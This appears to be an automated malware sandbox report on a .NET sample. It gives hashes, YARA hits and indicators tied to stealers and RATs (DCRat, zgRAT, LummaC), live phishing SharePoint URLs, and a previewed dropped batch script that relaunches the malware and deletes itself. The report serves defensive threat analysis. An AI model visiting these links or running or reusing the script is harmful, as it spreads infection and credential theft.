104.21.64.130 | https://staelensbe-my.sharepoint.com/:o:/g/personal/y_perat_staelens_be/Eh14BaQBnshOnnl-1qkV04QBK4iCBXufLQTxHyB9kk2q_A?e=5%3a4EIhFl&at=9 | malicious | HTMLPhisher, SharepointPhisher |
104.21.64.130 | Agreements Signature UYBWE6432324.html | malicious | Unknown |
104.21.64.130 | https://imsciencesedupk-my.sharepoint.com/:o:/g/personal/asim_iqbal_imsciences_edu_pk/ElMAC5PDodtLven3cSAK7AsBoGl8vhEeoWFGC5-26FuhVA?e=5%3ap8MOBi&at=9 | malicious | SharepointPhisher |
104.21.64.130 | https://skinlaundry-my.sharepoint.com/:o:/p/hayley/ErwFOgIpkFpEkqlJMxBaZKABrOVvhmW-2C7PFfCQdhhmhA?e=5%3atlRlQl&at=9 | malicious | HTMLPhisher, SharepointPhisher |
104.21.64.130 | File Documents UYBER87H412_23_24.html | malicious | Unknown |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
nutipa.ru | wmdqEYgW2i.exe | malicious | DCRat, PureLog Stealer, zgRAT | 172.67.185.214
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | SWIFT09181-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 104.21.67.152
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 104.21.51.88
CLOUDFLARENETUS | zapret.exe | malicious | Unknown | 162.159.136.232
CLOUDFLARENETUS | https://fsharetv.io | malicious | Unknown | 104.17.167.186
CLOUDFLARENETUS | https://fsharetv.co/ | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 104.21.79.7
CLOUDFLARENETUS | Merge.exe | malicious | NetSupport RAT | 104.26.1.231
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 172.67.207.38
CLOUDFLARENETUS | wN8pQhRNnu.exe | malicious | LummaC | 172.67.179.207
CLOUDFLARENETUS | AZCFTWko2q.exe | malicious | LummaC | 172.67.207.38
                                                      No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exe | wmdqEYgW2i.exe | malicious | DCRat, PureLog Stealer, zgRAT |
C:\Program Files\Google\Chrome\Application\Idle.exe | wmdqEYgW2i.exe | malicious | DCRat, PureLog Stealer, zgRAT |
C:\Recovery\KcduafKotlNaKVM.exe | wmdqEYgW2i.exe | malicious | DCRat, PureLog Stealer, zgRAT |
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:ASCII text, with very long lines (833), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):833
                                                            Entropy (8bit):5.900479262830104
                                                            Encrypted:false
                                                            SSDEEP:24:S9uDtY3es57ez+jMTeYYax+I06loWEnPJ8LXUXn:S8Bs57WTeji+IDov8Kn
                                                            MD5:5B360F0F49A86D396C1CC3F2EC72B8B3
                                                            SHA1:5477992029418C43B4330982188F2E16512FE922
                                                            SHA-256:7CB88DDC82C2449DA4F93C21D736C98784CF44B2F97B99A683EED403CBC25B63
                                                            SHA-512:4F1E3A730A10538A79F769D52FD2DBF70978A6309208D17FE00E5BA5214E306DB29FF3C27C5C17F0CC456C185C3A6540D91DB24B650097C1A8C161949A676044
                                                            Malicious:false
                                                            Reputation:low
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):3700736
                                                            Entropy (8bit):7.825669080809428
                                                            Encrypted:false
                                                            SSDEEP:98304:sALvAvoV3JDBQSBK5f7a6uBt9iofavIa:smvvV5DpQ7a6ugoCvI
                                                            MD5:E7870CD0C30A52066C454C15A5A5A2F5
                                                            SHA1:FC64203E05C104A116E7E4C354C9EE77C99737D6
                                                            SHA-256:E4A958444E72EB1B3BE02F3A8BF29044A81F328405A4969A4F66515EF219774E
                                                            SHA-512:3E0A40959EABA1FBF3CB7A11707BC658421F3066E4E1BEEA56088AC213C10524127D4D9E2500E549A1EE608887C113973892D54FB91FAE6EA9DB4EB9E818BEBE
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Google\Chrome\Application\Idle.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Google\Chrome\Application\Idle.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                            Joe Sandbox View:
                                                            • Filename: wmdqEYgW2i.exe, Detection: malicious, Browse
                                                            Reputation:low
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):3700736
                                                            Entropy (8bit):7.825669080809428
                                                            Encrypted:false
                                                            SSDEEP:98304:sALvAvoV3JDBQSBK5f7a6uBt9iofavIa:smvvV5DpQ7a6ugoCvI
                                                            MD5:E7870CD0C30A52066C454C15A5A5A2F5
                                                            SHA1:FC64203E05C104A116E7E4C354C9EE77C99737D6
                                                            SHA-256:E4A958444E72EB1B3BE02F3A8BF29044A81F328405A4969A4F66515EF219774E
                                                            SHA-512:3E0A40959EABA1FBF3CB7A11707BC658421F3066E4E1BEEA56088AC213C10524127D4D9E2500E549A1EE608887C113973892D54FB91FAE6EA9DB4EB9E818BEBE
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                            Joe Sandbox View:
                                                            • Filename: wmdqEYgW2i.exe, Detection: malicious, Browse
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):33
                                                            Entropy (8bit):4.4878932715826885
                                                            Encrypted:false
                                                            SSDEEP:3:gTbpQkaUyMdDC9n:gpQkfyMdm9n
                                                            MD5:EE9FFB8E0E124AED86A1047460BE3189
                                                            SHA1:B452E534DFA73FAE3BADE9D6E6A9A72228B3258E
                                                            SHA-256:5B76D56F64794F93D6E424E054670D8667D3A4564C6B53F8D9AE3D36464A7156
                                                            SHA-512:CD3AB7AB9D1AC26F5987A5672EF2AA83B124DDFE0FBD81F42E78A3B3C1E83D3FC910DE4428461DCC9538081683715DC79ABBAF3D7B28B37FE5553303F36688DC
                                                            Malicious:false
                                                            Preview:766Qc6Sk5rvADiqiGZw93b6idNr6LIhJz
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:ASCII text, with very long lines (516), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):516
                                                            Entropy (8bit):5.883314624840393
                                                            Encrypted:false
                                                            SSDEEP:12:zXXCchpLbyT/Qwi8e0n3wZCPD6TCl3QK3ZHF8qKHlLHRyy85p:zXXVbgQX3Y3wCoemW5p
                                                            MD5:E86147C65A26DCE1FD972244125CF6D2
                                                            SHA1:FF4592A0636614824CBD5A70A98375C04CC9380E
                                                            SHA-256:91C535120D9F013B2F93840A73BC10C3E3EA758E66C5C188D15472FA65566E9C
                                                            SHA-512:920FF6F9D2C6D57FB20DFE92931F7F3D8CC55F455250061B8534F77F062BBE0ACBD27FF7E2EC99FA594F5C4341C35DA38A49222730D5947B7794363D778C3430
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):3700736
                                                            Entropy (8bit):7.825669080809428
                                                            Encrypted:false
                                                            SSDEEP:98304:sALvAvoV3JDBQSBK5f7a6uBt9iofavIa:smvvV5DpQ7a6ugoCvI
                                                            MD5:E7870CD0C30A52066C454C15A5A5A2F5
                                                            SHA1:FC64203E05C104A116E7E4C354C9EE77C99737D6
                                                            SHA-256:E4A958444E72EB1B3BE02F3A8BF29044A81F328405A4969A4F66515EF219774E
                                                            SHA-512:3E0A40959EABA1FBF3CB7A11707BC658421F3066E4E1BEEA56088AC213C10524127D4D9E2500E549A1EE608887C113973892D54FB91FAE6EA9DB4EB9E818BEBE
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                            Joe Sandbox View:
                                                            • Filename: wmdqEYgW2i.exe, Detection: malicious, Browse
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:false
                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:ASCII text, with very long lines (466), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):466
                                                            Entropy (8bit):5.85421798396483
                                                            Encrypted:false
                                                            SSDEEP:12:tDDcy3RsrqNu/A3bVF4tWLmPneMO/IALN0eDeXJ:NDcyhssu/+J+qmWLuSeXJ
                                                            MD5:B4A6A3BED546516AEC772C7A8426FF30
                                                            SHA1:65377C9C1754AACD25E2AFBC1FEC8D8166AB66A6
                                                            SHA-256:4129A07C155366A6DC5F9937001A7A23BCEF178D661DE67F34A5A4000360E33D
                                                            SHA-512:3937D24EF0307B20F06A0CD9BCF13B1C12CC9B2E9899420A1CBBEFA6C943F4EBD8EDC1CCC5280054F65A9878C14012F9E05C8E04C56409B5C9FDC864FB151453
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:ASCII text, with very long lines (613), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):613
                                                            Entropy (8bit):5.884570909762723
                                                            Encrypted:false
                                                            SSDEEP:12:MmoBImUNKGwiwPlJXCTQDalCVWOK5o1N76HQwtO140ZcN7zcdkBa1SwRV:00wjXCTialh5oawwtodkgkC
                                                            MD5:F23DAA590CCBBD722999DA811BDD48D1
                                                            SHA1:08DAED4305C4C10F0FF7CF54441B98B421EA0372
                                                            SHA-256:9A819E3F3E82DF38A53ECE476096C3AF9DAC85F3ED95BBF27B731A510CC78019
                                                            SHA-512:6F53E3A72D53BFCD65CCEEBB312CF00F32C1E8BA40344FEE847B0E9B88ECA104F15ED6F316AC57F26983FA9DB2F9BDEDC861ADA8F0EDDFBE1C7C4032EB884EBE
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):3700736
                                                            Entropy (8bit):7.825669080809428
                                                            Encrypted:false
                                                            SSDEEP:98304:sALvAvoV3JDBQSBK5f7a6uBt9iofavIa:smvvV5DpQ7a6ugoCvI
                                                            MD5:E7870CD0C30A52066C454C15A5A5A2F5
                                                            SHA1:FC64203E05C104A116E7E4C354C9EE77C99737D6
                                                            SHA-256:E4A958444E72EB1B3BE02F3A8BF29044A81F328405A4969A4F66515EF219774E
                                                            SHA-512:3E0A40959EABA1FBF3CB7A11707BC658421F3066E4E1BEEA56088AC213C10524127D4D9E2500E549A1EE608887C113973892D54FB91FAE6EA9DB4EB9E818BEBE
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\conhost.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\conhost.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):3700736
                                                            Entropy (8bit):7.825669080809428
                                                            Encrypted:false
                                                            SSDEEP:98304:sALvAvoV3JDBQSBK5f7a6uBt9iofavIa:smvvV5DpQ7a6ugoCvI
                                                            MD5:E7870CD0C30A52066C454C15A5A5A2F5
                                                            SHA1:FC64203E05C104A116E7E4C354C9EE77C99737D6
                                                            SHA-256:E4A958444E72EB1B3BE02F3A8BF29044A81F328405A4969A4F66515EF219774E
                                                            SHA-512:3E0A40959EABA1FBF3CB7A11707BC658421F3066E4E1BEEA56088AC213C10524127D4D9E2500E549A1EE608887C113973892D54FB91FAE6EA9DB4EB9E818BEBE
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\winlogon.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\winlogon.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:modified
                                                            Size (bytes):1698
                                                            Entropy (8bit):5.367720686892084
                                                            Encrypted:false
                                                            SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4x:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4x
                                                            MD5:2C0A3C5388C3FAAFA50C8FB701A28891
                                                            SHA1:D75655E5C231DE60C96FD196658C429E155BEB0F
                                                            SHA-256:A44CB861DDF882F48202B95D3A8A535419C1AE0386666C84B803F9810473EDD7
                                                            SHA-512:0343301C34ED4FEB7EFF30186862EBC7446E6044955B3088B0BE0D86A3DACAE1BFC407A59D385E9CBB7A0DEF210DC3405FD442A598FD28431371E249F748258A
                                                            Malicious:true
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):25
                                                            Entropy (8bit):4.373660689688184
                                                            Encrypted:false
                                                            SSDEEP:3:Xl5pALKD:VCKD
                                                            MD5:66AFC0A5D6F1C77CC79375DD57471564
                                                            SHA1:D94897FC9F669BF1859031FED5B37BC352A5C1F5
                                                            SHA-256:1589DB90DC363FB95344F9D937E023B6442E440402CB7E76EEB8C035D4D4EED6
                                                            SHA-512:1EDD816C6FB6BB56D86D0C0714A7D0A0C67744A2F1C3C70AF0085C3F22DB0DA17A42E221F418DE5176C27BCE8D5F3D3E087041A8AEDE55FC9C3412022E132C7E
                                                            Malicious:false
                                                            Preview:3fQ7gMJlKHvWULeOQVoIxQbzf
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):213
                                                            Entropy (8bit):5.1268381674417425
                                                            Encrypted:false
                                                            SSDEEP:6:hCijTg3Nou1SV+DE1wvUmLCvKOZG1wkn23fJMYH:HTg9uYDEmMnDfxF
                                                            MD5:4B13E93194C9762C5D429A7088D4DF12
                                                            SHA1:75996F83756F7C01812C65DD4C0B346C1E514891
                                                            SHA-256:982BC0345307A81756682CC95D97CEC61C821D81A3454414BBC5694432DA9DDA
                                                            SHA-512:D8877D2F6B4E6CC547ADB2DB90770A9CFC51A0209020DDC3AD516A821DDDF60BA61ECFBC3D460A5C5CFCFBF0768461429E1A219297191F05F8F27F75A9C8038C
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\Desktop\150bIjWiGH.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\abd16af8Ll.bat"
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:ASCII text, with very long lines (312), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):312
                                                            Entropy (8bit):5.786407035296692
                                                            Encrypted:false
                                                            SSDEEP:6:dK0SvPiFa/nkZm4egbY34d+nnxRzli1ktxQwmmWKFViCynhlKKV2L3MY8mv:d3qWa/kZm4jkXpEWXP1ypmv
                                                            MD5:35869CF70F018A808D98F99C38781702
                                                            SHA1:F99D7879AB59F153CDA5584D914503D7A0564FDA
                                                            SHA-256:AC906CAF331B4705EF49321EA75EBA3FE4F2838B273EB92ECE33343F20CE7BBE
                                                            SHA-512:55B4BACDBEC918A031B3B83F5AF691AB3F48EDF1A737A272F1F43ADD749CB55ABF0231FDC6B3B773A4C4BCA62DE4DA5A5D4FA34AA52C63BC335F8245C520B9A7
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):69632
                                                            Entropy (8bit):5.932541123129161
                                                            Encrypted:false
                                                            SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                            MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                            SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                            SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                            SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):34816
                                                            Entropy (8bit):5.636032516496583
                                                            Encrypted:false
                                                            SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                            MD5:996BD447A16F0A20F238A611484AFE86
                                                            SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                            SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                            SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):38912
                                                            Entropy (8bit):5.679286635687991
                                                            Encrypted:false
                                                            SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                            MD5:9E910782CA3E88B3F87826609A21A54E
                                                            SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                            SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                            SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):70144
                                                            Entropy (8bit):5.909536568846014
                                                            Encrypted:false
                                                            SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                            MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                            SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                            SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                            SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 29%
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):50176
                                                            Entropy (8bit):5.723168999026349
                                                            Encrypted:false
                                                            SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                            MD5:2E116FC64103D0F0CF47890FD571561E
                                                            SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                            SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                            SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):294912
                                                            Entropy (8bit):6.010605469502259
                                                            Encrypted:false
                                                            SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                            MD5:00574FB20124EAFD40DC945EC86CA59C
                                                            SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                            SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                            SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):342528
                                                            Entropy (8bit):6.170134230759619
                                                            Encrypted:false
                                                            SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                            MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                            SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                            SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                            SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):36352
                                                            Entropy (8bit):5.668291349855899
                                                            Encrypted:false
